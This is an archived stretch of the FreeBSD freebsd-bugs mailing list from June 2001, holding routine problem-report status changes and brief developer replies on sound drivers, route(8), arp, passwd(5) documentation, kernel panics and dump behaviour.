reply was made to PR i386/27934; it has been noted by GNATS. From: Peter Pentchev To: belgaut@netrover.com Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: i386/27934: My sound card Aureal with chip 8830 ( vortex 2 ) no work Date: Thu, 7 Jun 2001 15:14:46 +0300 On Thu, Jun 07, 2001 at 05:06:02AM -0700, belgaut@netrover.com wrote: > > >Number: 27934 > >Category: i386 > >Synopsis: My sound card Aureal with chip 8830 ( vortex 2 ) no work > >Responsible: freebsd-bugs > >Originator: Sylvain Bellemare > >Release: FreeBsd 4.3 > >Organization: > prive > >Environment: > >Description: > I make a kernel all work fine but in the /modules snd_au88 is not in place The Aureal sound drivers are not in the base system. You must install the audio/aureal-kmod port. It places files in /usr/local/lib/au88x0/, and the appropriate sound driver is loaded on startup by the startup script, which is installed in /usr/local/etc/rc.d/. Only a sample startup script is installed, though - you have to manually rename it to aureal.sh so it gets started :) G'luck, Peter -- This sentence contains exactly threee erors. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 5:46:23 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B3E037B406; Thu, 7 Jun 2001 05:46:21 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57CkL849847; Thu, 7 Jun 2001 05:46:21 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 05:46:21 -0700 (PDT) From: Message-Id: <200106071246.f57CkL849847@freefall.freebsd.org> To: leres@ee.lbl.gov, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/12357: [PATCH] allow route to create "proxy only" arp entries Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] allow route to create "proxy only" arp entries State-Changed-From-To: open->analyzed State-Changed-By: ru State-Changed-When: Thu Jun 7 05:38:23 PDT 2001 State-Changed-Why: I have just fixed the arp(8) command so that it can create published proxy-only ARP entries irrespective of whether or not the route to a destination already exists. Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Thu Jun 7 05:38:23 PDT 2001 Responsible-Changed-Why: But I think having a similar functionality in route(8) would also be great. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=12357 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 5:58:19 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0CBC737B405; Thu, 7 Jun 2001 05:58:17 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57CwHQ50933; Thu, 7 Jun 2001 05:58:17 -0700 (PDT) (envelope-from iedowse) Date: Thu, 7 Jun 2001 05:58:17 -0700 (PDT) From: Message-Id: <200106071258.f57CwHQ50933@freefall.freebsd.org> To: james-hunsaker@uiowa.edu, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13630: system halts after npx0 detected on 3.2 install Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: system halts after npx0 detected on 3.2 install State-Changed-From-To: feedback->closed State-Changed-By: iedowse State-Changed-When: Thu Jun 7 05:47:37 PDT 2001 State-Changed-Why: Submitter has not tried booting more recent releases on the problem machine, so without any further information, I'll assume the issue is resolved. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13630 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:10: 9 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from shade.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id BF69737B401; Thu, 7 Jun 2001 06:10:03 -0700 (PDT) (envelope-from nectar@nectar.com) Received: (from nectar@localhost) by shade.nectar.com (8.11.3/8.11.3) id f57DA2r02874; Thu, 7 Jun 2001 08:10:02 -0500 (CDT) (envelope-from nectar) Date: Thu, 7 Jun 2001 08:09:57 -0500 From: "Jacques A. Vidrine" To: Ruslan Ermilov Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: misc/27915: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd Message-ID: <20010607080956.A496@shade.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , Ruslan Ermilov , freebsd-bugs@FreeBSD.org References: <200106070740.f577e3B96171@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106070740.f577e3B96171@freefall.freebsd.org>; from ru@FreeBSD.ORG on Thu, Jun 07, 2001 at 12:40:03AM -0700 X-Url: http://www.nectar.com/ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 12:40:03AM -0700, Ruslan Ermilov wrote: > This bug is only present in RELENG_4. > > If (?) the nsswitch support will be imported into > RELENG_4, this bug will be automatically fixed. There aren't any plans at this time to MFC nsswitch. -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:20:29 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0EF0637B407; Thu, 7 Jun 2001 06:20:28 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57DKSi55704; Thu, 7 Jun 2001 06:20:28 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 06:20:28 -0700 (PDT) From: Message-Id: <200106071320.f57DKSi55704@freefall.freebsd.org> To: wmoran@iowna.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/27915: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd State-Changed-From-To: open->suspended State-Changed-By: ru State-Changed-When: Thu Jun 7 06:19:09 PDT 2001 State-Changed-Why: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27915 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:25:32 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9062637B405; Thu, 7 Jun 2001 06:25:28 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57DPSE56526; Thu, 7 Jun 2001 06:25:28 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 06:25:28 -0700 (PDT) From: Message-Id: <200106071325.f57DPSE56526@freefall.freebsd.org> To: wmoran@iowna.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-docs@FreeBSD.org Subject: Re: docs/27915: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd State-Changed-From-To: suspended->open State-Changed-By: ru State-Changed-When: Thu Jun 7 06:24:01 PDT 2001 State-Changed-Why: Damn edit-pr(1), this wasn't supposed to be suspended. Responsible-Changed-From-To: freebsd-bugs->freebsd-docs Responsible-Changed-By: ru Responsible-Changed-When: Thu Jun 7 06:24:01 PDT 2001 Responsible-Changed-Why: This actually belongs to the "docs" category. -CURRENT's passwd(5) manpage has all the necessary bits. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27915 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:26:43 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C5B3337B403; Thu, 7 Jun 2001 06:26:40 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57DQeA56711; Thu, 7 Jun 2001 06:26:40 -0700 (PDT) (envelope-from iedowse) Date: Thu, 7 Jun 2001 06:26:40 -0700 (PDT) From: Message-Id: <200106071326.f57DQeA56711@freefall.freebsd.org> To: arousch@home.com, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14751: SMP system crash while running make world Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: SMP system crash while running make world State-Changed-From-To: open->closed State-Changed-By: iedowse State-Changed-When: Thu Jun 7 06:22:03 PDT 2001 State-Changed-Why: A lot has changed since 3.3, so I assume whatever caused this has been fixed. At the minimum, some sort of stack trace would be needed to debug this further. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14751 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:42:40 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 26D8B37B406; Thu, 7 Jun 2001 06:42:39 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57Dgdr67681; Thu, 7 Jun 2001 06:42:39 -0700 (PDT) (envelope-from iedowse) Date: Thu, 7 Jun 2001 06:42:39 -0700 (PDT) From: Message-Id: <200106071342.f57Dgdr67681@freefall.freebsd.org> To: iga@metabyte.com, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13180: panic: ffs_alloccg: map corrupted Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: panic: ffs_alloccg: map corrupted State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Thu Jun 7 06:40:59 PDT 2001 State-Changed-Why: Does this still occur in recent versions of FreeBSD? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13180 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:45:59 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C993E37B405; Thu, 7 Jun 2001 06:45:57 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57Djuu78527; Thu, 7 Jun 2001 06:45:56 -0700 (PDT) (envelope-from iedowse) Date: Thu, 7 Jun 2001 06:45:56 -0700 (PDT) From: Message-Id: <200106071345.f57Djuu78527@freefall.freebsd.org> To: mishania@demos.net, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13198: panic: vm_fault: fault on nofault entry Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: panic: vm_fault: fault on nofault entry State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Thu Jun 7 06:42:55 PDT 2001 State-Changed-Why: I believe this may have been fixed some time ago - can you confirm that it does not occur on more recent releases? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13198 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:48:31 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C89B237B405; Thu, 7 Jun 2001 06:48:29 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57DmTS90163; Thu, 7 Jun 2001 06:48:29 -0700 (PDT) (envelope-from iedowse) Date: Thu, 7 Jun 2001 06:48:29 -0700 (PDT) From: Message-Id: <200106071348.f57DmTS90163@freefall.freebsd.org> To: tjw00@bayarea.net, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14890: ffs_valloc: dup alloc Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ffs_valloc: dup alloc State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Thu Jun 7 06:47:22 PDT 2001 State-Changed-Why: There's not a lot of information to go on here; does this problem still occur in more recent releases? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14890 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:51:59 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C85237B403; Thu, 7 Jun 2001 06:51:58 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57Dpwc08179; Thu, 7 Jun 2001 06:51:58 -0700 (PDT) (envelope-from iedowse) Date: Thu, 7 Jun 2001 06:51:58 -0700 (PDT) From: Message-Id: <200106071351.f57Dpwc08179@freefall.freebsd.org> To: mishania@demos.net, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13198: panic: vm_fault: fault on nofault entry Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: panic: vm_fault: fault on nofault entry State-Changed-From-To: feedback->closed State-Changed-By: iedowse State-Changed-When: Thu Jun 7 06:51:28 PDT 2001 State-Changed-Why: Mail to submitter bounces. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13198 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 6:52:31 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B19F937B407; Thu, 7 Jun 2001 06:52:29 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57DqTI10194; Thu, 7 Jun 2001 06:52:29 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 06:52:29 -0700 (PDT) From: Message-Id: <200106071352.f57DqTI10194@freefall.freebsd.org> To: larse@isi.edu, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/12489: /sbin/route exits with 0 on some errors Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /sbin/route exits with 0 on some errors State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Thu Jun 7 06:43:23 PDT 2001 State-Changed-Why: Fixed in route.c,v 1.45 and documented in route.8,v 1.23. (The route(8) utility now exits 1 if an error occurs.) Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Thu Jun 7 06:43:23 PDT 2001 Responsible-Changed-Why: The fixes were mine. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=12489 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 7: 2:25 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4AC8C37B401; Thu, 7 Jun 2001 07:02:23 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57E2MQ50184; Thu, 7 Jun 2001 07:02:22 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 07:02:22 -0700 (PDT) From: Message-Id: <200106071402.f57E2MQ50184@freefall.freebsd.org> To: jch@oleane.net, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14175: route for ip aliasing Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: route for ip aliasing State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Thu Jun 7 07:00:15 PDT 2001 State-Changed-Why: Asked and answered. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14175 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 7:24: 1 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 33E2F37B403; Thu, 7 Jun 2001 07:24:00 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57EO0Q65961; Thu, 7 Jun 2001 07:24:00 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 07:24:00 -0700 (PDT) From: Message-Id: <200106071424.f57EO0Q65961@freefall.freebsd.org> To: seraf@2600.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/23118: static link-level route bug? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: static link-level route bug? State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Thu Jun 7 07:22:44 PDT 2001 State-Changed-Why: Asked and answered. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=23118 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 7:30: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A82D437B403 for ; Thu, 7 Jun 2001 07:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57EU3w66429; Thu, 7 Jun 2001 07:30:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 7 Jun 2001 07:30:03 -0700 (PDT) Message-Id: <200106071430.f57EU3w66429@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Vladimir B. Grebenschikov" Subject: Re: bin/14175: route for ip aliasing Reply-To: "Vladimir B. Grebenschikov" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/14175; it has been noted by GNATS. From: "Vladimir B. Grebenschikov" To: freebsd-gnats-submit@FreeBSD.org Cc: jch@oleane.net, ru@FreeBSD.org Subject: Re: bin/14175: route for ip aliasing Date: Thu, 7 Jun 2001 18:23:31 +0400 (MSD) ru@FreeBSD.ORG writes: > Synopsis: route for ip aliasing > > State-Changed-From-To: open->closed > State-Changed-By: ru > State-Changed-When: Thu Jun 7 07:00:15 PDT 2001 > State-Changed-Why: > Asked and answered. Actual I think not good idea support different address schemes for netstat -r and route(8) utilites: # route add 10.0.0.0/16 192.168.14.1 add net 10.0.0.0: gateway 192.168.14.1 # netstat -rn | egrep \^10 10/16 192.168.14.1 UGSc 0 0 fxp0 # route delete 10/16 route: writing to routing socket: No such process delete net 10: not in table # route delete 10.0.0.0/16 delete net 10.0.0.0 # if netstat deal with addreses like 10/16, I think route need to deal with them too. -- TSB Russian Express, Moscow Vladimir B. Grebenschikov, vova@express.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 8:45:32 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5E50137B405; Thu, 7 Jun 2001 08:45:30 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57FjUg76491; Thu, 7 Jun 2001 08:45:30 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 08:45:30 -0700 (PDT) From: Message-Id: <200106071545.f57FjUg76491@freefall.freebsd.org> To: mab@red-bean.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/26833: `route change default' broken when gateway is over down interface Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: `route change default' broken when gateway is over down interface State-Changed-From-To: open->analyzed State-Changed-By: ru State-Changed-When: Thu Jun 7 08:45:11 PDT 2001 State-Changed-Why: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26833 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 8:51:18 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from beppo.feral.com (beppo.feral.com [192.67.166.79]) by hub.freebsd.org (Postfix) with ESMTP id 6935437B409; Thu, 7 Jun 2001 08:51:13 -0700 (PDT) (envelope-from mjacob@feral.com) Received: from beppo (mjacob@beppo [192.67.166.79]) by beppo.feral.com (8.11.3/8.11.3) with ESMTP id f57FpCg22900; Thu, 7 Jun 2001 08:51:12 -0700 (PDT) (envelope-from mjacob@feral.com) Date: Thu, 7 Jun 2001 08:51:12 -0700 (PDT) From: Matthew Jacob Reply-To: mjacob@feral.com To: Ruslan Ermilov Cc: phk@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG Subject: Re: bin/16812: level 0 dump runs forever -- generates a backup much larger than the available disk. In-Reply-To: <20010607101310.E26609@sunbay.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 7 Jun 2001, Ruslan Ermilov wrote: > On Wed, Jun 06, 2001 at 01:54:02PM -0700, phk@FreeBSD.ORG wrote: > > Synopsis: level 0 dump runs forever -- generates a backup much larger than the available disk. > > > > State-Changed-From-To: open->closed > > State-Changed-By: phk > > State-Changed-When: Wed Jun 6 13:53:44 PDT 2001 > > State-Changed-Why: > > Sounds like you need a full FSCK and a find to locate sparse files. > > > > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16812 > > > Any insight on how find(1) could be used to locate sparse files? > And shouldn't dump(8) handle sparse files intelligently? Hmm. Yes. This sounds like a good RFE. Poul- anyone-? This is a perfect summer intern project. > > > Cheers, > -- > Ruslan Ermilov Oracle Developer/DBA, > ru@sunbay.com Sunbay Software AG, > ru@FreeBSD.org FreeBSD committer, > +380.652.512.251 Simferopol, Ukraine > > http://www.FreeBSD.org The Power To Serve > http://www.oracle.com Enabling The Information Age > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 9: 8: 2 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B49337B405; Thu, 7 Jun 2001 09:07:59 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57G7wp81538; Thu, 7 Jun 2001 09:07:58 -0700 (PDT) (envelope-from ru) Date: Thu, 7 Jun 2001 09:07:58 -0700 (PDT) From: Message-Id: <200106071607.f57G7wp81538@freefall.freebsd.org> To: mi@aldan.algebra.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/1093: route's diagnostic is weird Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: route's diagnostic is weird State-Changed-From-To: suspended->closed State-Changed-By: ru State-Changed-When: Thu Jun 7 09:07:15 PDT 2001 State-Changed-Why: Superseded by PR 26833. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=1093 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 9:11: 2 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id 6805537B405 for ; Thu, 7 Jun 2001 09:10:52 -0700 (PDT) (envelope-from ru@whale.sunbay.crimea.ua) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.2/8.11.2) id f57GAEu94786; Thu, 7 Jun 2001 19:10:14 +0300 (EEST) (envelope-from ru) Date: Thu, 7 Jun 2001 19:10:14 +0300 From: Ruslan Ermilov To: mi@aldan.algebra.com, freebsd-bugs@FreeBSD.org Subject: Re: bin/1093: route's diagnostic is weird Message-ID: <20010607191014.A94545@sunbay.com> Mail-Followup-To: mi@aldan.algebra.com, freebsd-bugs@FreeBSD.org References: <200106071607.f57G7wp81538@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106071607.f57G7wp81538@freefall.freebsd.org>; from ru@FreeBSD.org on Thu, Jun 07, 2001 at 09:07:58AM -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 09:07:58AM -0700, ru@FreeBSD.org wrote: > Synopsis: route's diagnostic is weird > > State-Changed-From-To: suspended->closed > State-Changed-By: ru > State-Changed-When: Thu Jun 7 09:07:15 PDT 2001 > State-Changed-Why: > Superseded by PR 26833. > I will comment on PR 26833 later, when I figure some obscure details with a gateway route allocation. Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 10:10: 4 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C85E737B406; Thu, 7 Jun 2001 10:10:02 -0700 (PDT) (envelope-from greid@FreeBSD.org) Received: (from greid@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57HA2o92662; Thu, 7 Jun 2001 10:10:02 -0700 (PDT) (envelope-from greid) Date: Thu, 7 Jun 2001 10:10:02 -0700 (PDT) From: Message-Id: <200106071710.f57HA2o92662@freefall.freebsd.org> To: belgaut@netrover.com, greid@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/27934: My sound card Aureal with chip 8830 ( vortex 2 ) no work Sender: 